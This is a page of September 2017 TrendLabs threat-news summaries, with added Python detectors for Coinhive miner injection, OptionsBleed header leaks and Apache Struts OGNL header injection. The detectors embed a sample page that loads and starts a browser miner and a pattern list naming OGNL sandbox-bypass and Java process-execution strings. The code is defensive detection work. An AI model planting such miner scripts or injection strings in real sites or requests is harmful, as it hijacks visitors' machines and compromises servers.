Malware and AntiVirus News

TrendLabs Security Intelligence Blog

Threat News and Information Direct from the Experts

Business Process Compromise and the Underground’s Economy of Coupon Fraud Thursday, 28 September 2017, 12:03 pm

The fraudulent redemption of freebies, discounts, and rebates in the form of coupons is reportedly costing U.S. businesses $300–600 million every year. And where there’s money to be made, there are cybercriminals rustling up schemes to take advantage of it. Coupon fraud is no exception: we found it rife and thriving in the underground.

What does coupon fraud mean for businesses? In 2012, major manufacturers were victimized by counterfeit coupons, with one consumer goods corporation pegging its losses to around $1.28 million. Another coupon fraud scheme almost a decade in the making stole at least $250 million from companies.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Source: TrendLabs Security Intelligence Blog | Trend Micro Deep Security Labs

An Elaborate ATM Threat Crops Up: Network-based ATM Malware Attacks Tuesday, 26 September 2017, 12:00 pm

Infecting automated teller machines (ATMs) with malware is nothing new. It’s concerning, yes. But new? Not really. We’ve been seeing physical attacks against ATMs since 2009. By physical, we mean opening the target machine’s casing, accessing the motherboard and connecting USB drives or CD-ROMs in order to infect the operating system. Once infected, the ATM is at the attackers’ mercy, which normally means that they are able to empty the money cassettes and walk away with fully loaded wallets. In 2016, we released a joint paper with Europol’s European Cybercrime Centre (EC3) that discussed the shift from physical to digital means of emptying an ATM and described the different ATM malware families that had been seen in the wild by then.

What has happened since? On top of many more malware families entering the landscape, which was to be expected, one development we forecast has unfortunately come to pass: attackers have started infecting ATMs with malware over the network. Five distinct incidents of network-based ATM malware attacks have already been reported in the media. We consider this significant because it shows that cybercriminals now have ATMs firmly in their crosshairs.

Source: TrendLabs Security Intelligence Blog | Trend Micro Forward-Looking Threat Research Team

ZNIU: First Android Malware to Exploit Dirty COW Vulnerability Monday, 25 September 2017, 12:00 pm

The Linux vulnerability called Dirty COW (CVE-2016-5195) was first publicly disclosed in 2016. It is a race condition in the kernel’s copy-on-write handling, categorized as a serious privilege escalation flaw that lets a local, unprivileged attacker gain root access on the targeted system; it affects upstream Linux distributions such as Red Hat as well as Android, whose kernel is based on Linux. Dirty COW attacks on Android had been silent since its discovery, perhaps because it took attackers some time to build a stable exploit for major devices. Almost a year later, Trend Micro researchers captured samples of ZNIU (detected as AndroidOS_ZNIU), the first malware family to exploit the vulnerability on the Android platform.

Source: TrendLabs Security Intelligence Blog | Mobile Threat Response Team

EITest Campaign Uses Tech Support Scams to Deliver Coinhive’s Monero Miner Friday, 22 September 2017, 4:01 pm

We’ve uncovered the notorious EITest campaign delivering a JavaScript (JS) cryptocurrency miner (detected by Trend Micro as HKTL_COINMINE) using tech support scams as a social engineering lure. These are fraud operations that impersonate legitimate technical support services and con unwitting victims into paying for bogus services (or handing over financial data), typically by scaring them into believing their machine has been infected with malware.

The EITest campaign’s main arsenal is compromised websites. Its activity can be traced to as early as 2014 and once used the Angler exploit kit to deliver ransomware. Starting January 2017, it has eschewed exploit kits in favor of “HoeflerText” (a popular font) phishing attacks or  . In a month, we identified 990 compromised websites injected with a malicious script that diverts the would-be victim to a website related to the tech support scam. Of late, though, the campaign has added the Coinhive JS miner into ongoing attacks, turning the victim’s computer into a Monero cryptocurrency miner. Analysis also revealed that this JS cryptocurrency miner is the same “Coinhive” JS miner found embedded in The Pirate Bay’s website.
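The injection described above leaves a recognisable trace in the compromised page: a script tag loading Coinhive’s library and an inline call that starts the miner with the operator’s site key. The following is an added example (not code from the Trend Micro post) that pulls every script out of a saved page and reports those two indicators. The library URL pattern and the `CoinHive.Anonymous(siteKey)` constructor are Coinhive’s public interface; the two sample pages are constructed for this example, not captures from the campaign.

```python
import re
from html.parser import HTMLParser

# Indicators for the Coinhive browser miner. The library URL and the
# CoinHive.Anonymous(siteKey) constructor were Coinhive's public interface;
# the second regex also accepts the User/Token variants of the constructor.
COINHIVE_LOADER = re.compile(r"coinhive\.com/lib/", re.I)
COINHIVE_START = re.compile(
    r"CoinHive\.(?:Anonymous|User|Token)\s*\(\s*['\"]([A-Za-z0-9]+)['\"]")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of <script> elements without src
        self._buf = None        # accumulates the body of the current inline script

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def find_coinhive(html: str):
    """Return (kind, detail) findings: the loader URL and the site key the miner pays out to."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        if COINHIVE_LOADER.search(src):
            findings.append(("loader", src))
    for body in collector.inline:
        match = COINHIVE_START.search(body)
        if match:
            findings.append(("site_key", match.group(1)))
    return findings


# Constructed sample pages (not captures from the EITest campaign).
CLEAN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><p>hello</p><script>console.log("ok");</script></body></html>"""

INJECTED_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><p>hello</p>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLESITEKEY0000');
  miner.start();
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, find_coinhive(page))
```

The site key is the one value worth keeping from a hit: it identifies the account the mined Monero is credited to, so it lets you cluster compromised sites belonging to the same operator across many pages. Obfuscated loaders (the library copied to another host, or the constructor built from string fragments) will slip past the two regexes; treat this as a first-pass triage, not a complete signature.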

Source: TrendLabs Security Intelligence Blog | Joseph C Chen (Fraud Researcher)

OptionsBleed – The Apache HTTP Server Now Bleeds Friday, 22 September 2017, 11:04 am

A new vulnerability in the Apache HTTP Server was disclosed recently. Designated CVE-2017-9798, it lies in how Apache handles <Limit> directives in its configuration files (including .htaccess) that name an HTTP method the server has not registered; the result is a use-after-free whose contents surface in the Allow header Apache returns to OPTIONS requests, leaking server memory to the client. The bug was named OptionsBleed for its resemblance to Heartbleed. Patches to Apache are now available.
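Because the leak shows up in a response header, it can be checked from the client side without any access to the server. The following is an added example (not code from the Trend Micro post) that parses a captured OPTIONS response and flags an Allow value that cannot be a well-formed method list: empty list elements, repeated methods, characters outside the RFC 7230 token set, or non-ASCII bytes. Both sample responses are constructed for this example. Since what leaks depends on heap state, a live check needs many OPTIONS requests to the same URL, not one.

```python
import re

# RFC 7230 "token": the only characters a method name in Allow may contain.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_allow(raw_response: bytes):
    """Return the raw value of the Allow header from an HTTP/1.x response, or None."""
    head = raw_response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"allow":
            return value.strip()
    return None


def allow_anomalies(allow: bytes):
    """Describe anything in an Allow value that a sane method list would never contain."""
    issues = []
    try:
        text = allow.decode("ascii")
    except UnicodeDecodeError:
        issues.append("non-ASCII bytes")            # leaked memory is rarely clean text
        text = allow.decode("latin-1")
    seen = set()
    for item in text.split(","):
        method = item.strip()
        if method == "":
            issues.append("empty list element")     # ',,' in the middle of the list
        elif not _TOKEN.match(method):
            issues.append(f"malformed token {method!r}")
        elif method in seen:
            issues.append(f"duplicate method {method}")
        seen.add(method)
    return issues


def check_options_response(raw_response: bytes) -> bool:
    """True if the response's Allow header looks like it carries leaked heap data."""
    allow = parse_allow(raw_response)
    return allow is not None and bool(allow_anomalies(allow))


# Constructed sample responses (not real captures). Only the Allow header matters here.
CLEAN = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
         b"Allow: GET,HEAD,POST,OPTIONS\r\n"
         b"Content-Length: 0\r\n\r\n")
LEAKY = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
         b"Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,POST,\x8a\x03ab\xf1\r\n"
         b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for name, resp in (("clean", CLEAN), ("leaky", LEAKY)):
        print(name, check_options_response(resp), allow_anomalies(parse_allow(resp)))
```

A healthy server answers OPTIONS with a short, fixed list such as `GET,HEAD,POST,OPTIONS` every time; a vulnerable one returns a list that changes between requests and contains repeated or empty entries, and occasionally raw binary. The check is deliberately strict about the token grammar so that any leaked byte, printable or not, registers as a finding.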

Source: TrendLabs Security Intelligence Blog | Trend Micro Deep Security Labs

a-PATCH-e: Struts Vulnerabilities Run Rampant Thursday, 21 September 2017, 4:01 pm

Equifax confirmed the attack vector used in its data breach to be CVE-2017-5638, a remote code execution flaw in the Jakarta Multipart parser of Apache Struts 2 that was patched in March 2017 via S2-045. The vulnerability was exploited to gain unauthorized access to highly sensitive data of approximately 143 million U.S. and 400,000 U.K. customers, as well as 100,000 Canadian consumers. It was first disclosed in March and almost immediately followed by publicly available POCs, weaponized exploits, and scanners produced by third parties.

Trend Micro has observed thousands of hits on our intrusion prevention filters for this vulnerability since March, and exploitation and enumeration attempts are still being seen. Trend Micro customers can use these filters as a highly effective virtual patch for critical Apache Struts vulnerabilities until the actual software updates are deployed to secure the system.
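The reason a network filter works so well against this bug is that the injection rides in a request header: the Jakarta Multipart parser copied the Content-Type value into an error message that Struts then evaluated as an OGNL expression, so every exploit and scanner has to put `%{` or `${` and OGNL-specific names into a header where they never legitimately appear. The following is an added example (not Trend Micro’s filter logic) of that detection over raw HTTP requests. Both requests are constructed; the second carries only a harmless marker string that trips the detector and is not an exploit payload.

```python
import re

# Header fields the public CVE-2017-5638 exploits abused: the Jakarta Multipart
# parser copied their values into an error message that Struts then evaluated as OGNL.
WATCHED_HEADERS = ("content-type", "content-disposition", "content-length")

# Substrings that never occur in a legitimate value of those headers.
OGNL_MARKERS = (
    re.compile(r"[%$]\{"),                          # opening of an OGNL expression
    re.compile(r"#_memberAccess", re.I),            # the sandbox object payloads tamper with
    re.compile(r"@ognl\.OgnlContext@", re.I),
    re.compile(r"#context\s*\[", re.I),
    re.compile(r"java\.lang\.(?:Runtime|ProcessBuilder)", re.I),
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request line, {lower-cased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def ognl_hits(raw: bytes):
    """Return [(header, matched marker)] for every watched header carrying an OGNL marker."""
    _, headers = parse_request(raw)
    hits = []
    for field in WATCHED_HEADERS:
        value = headers.get(field)
        if value is None:
            continue
        for marker in OGNL_MARKERS:
            m = marker.search(value)
            if m:
                hits.append((field, m.group(0)))
                break                               # one hit per header is enough
    return hits


def is_struts_probe(raw: bytes) -> bool:
    """Verdict for a single request: any marker in any watched header."""
    return bool(ognl_hits(raw))


# Constructed requests (not captures). The second carries only a harmless marker
# string, enough to trip the detector; it is not an exploit payload.
BENIGN_UPLOAD = (
    b"POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    b"Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWxk\r\n"
    b"Content-Length: 138\r\n\r\n")
PROBE = (
    b"POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    b"Content-Type: %{(#_memberAccess).(#probe='constructed')}\r\n"
    b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_UPLOAD), ("probe", PROBE)):
        print(name, ognl_hits(req))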

Source: TrendLabs Security Intelligence Blog | Trend Micro

New RETADUP Variants Hit South America, Turn To Cryptocurrency Mining Wednesday, 20 September 2017, 2:43 pm

Several months ago, we discovered and exposed RETADUP malware in Israeli hospitals. We also learned that an Android malware known as “GhostCtrl” was stored in their infrastructure, which might be used for cyberespionage or cybercrime.

Source: TrendLabs Security Intelligence Blog | Trend Micro Cyber Safety Solutions Team

Locky Ransomware Pushed Alongside FakeGlobe in Upgraded Spam Campaigns Monday, 18 September 2017, 4:00 pm

In the beginning of September, a sizeable spam campaign was detected distributing a new Locky variant. Locky is a notorious ransomware that was first detected in the early months of 2016 and has continued to evolve and spread through different methods, particularly spam mail. A thorough look at samples from recent campaigns shows that cybercriminals are using sophisticated distribution methods, affecting users in more than 70 countries.

In the specific campaigns discussed below, both Locky and the ransomware FakeGlobe were being distributed—but the two were rotated. The cybercriminals behind the campaign designed it so that clicking on a link from the spam email might deliver Locky one hour, and then FakeGlobe the next. This makes re-infection a distinct possibility, as victims infected with one ransomware are still vulnerable to the next one in the rotation.

Source: TrendLabs Security Intelligence Blog | Trend Micro

iXintpwn/YJSNPI Abuses iOS’s Config Profile, can Crash Devices Monday, 18 September 2017, 10:05 am

While iOS devices generally see relatively fewer threats because of the platform’s walled-garden approach to how apps are installed, it is not entirely unbreachable. We saw a number of threats that successfully scaled the walls in 2016, from those that abused enterprise certificates to ones that exploited vulnerabilities to circumvent Apple’s stringent control over its platforms.

This is further exemplified by iXintpwn/YJSNPI (detected by Trend Micro as TROJ_YJSNPI.A), a malicious configuration profile that can render an iOS device unresponsive. It is a remnant of the work of a Japanese script kiddie who was arrested in early June this year.

While iXintpwn/YJSNPI seems currently concentrated in Japan, it won’t surprise anyone if it spreads beyond the country given how it proliferated in social media.

Source: TrendLabs Security Intelligence Blog | Trend Micro

Advisory: BlueBorne Reportedly Affects Billions of Bluetooth-Enabled Devices Friday, 15 September 2017, 1:00 pm

BlueBorne is a set of vulnerabilities affecting the implementation of Bluetooth in iOS, Android, Linux, Windows and Mac OS devices. According to the researchers who uncovered them, BlueBorne affects around 5.3 billion Bluetooth-enabled devices. The immediate mitigation is to patch the device if a patch is available, or to switch off Bluetooth when it is not needed.

Source: TrendLabs Security Intelligence Blog | Trend Micro Cyber Safety Solutions Team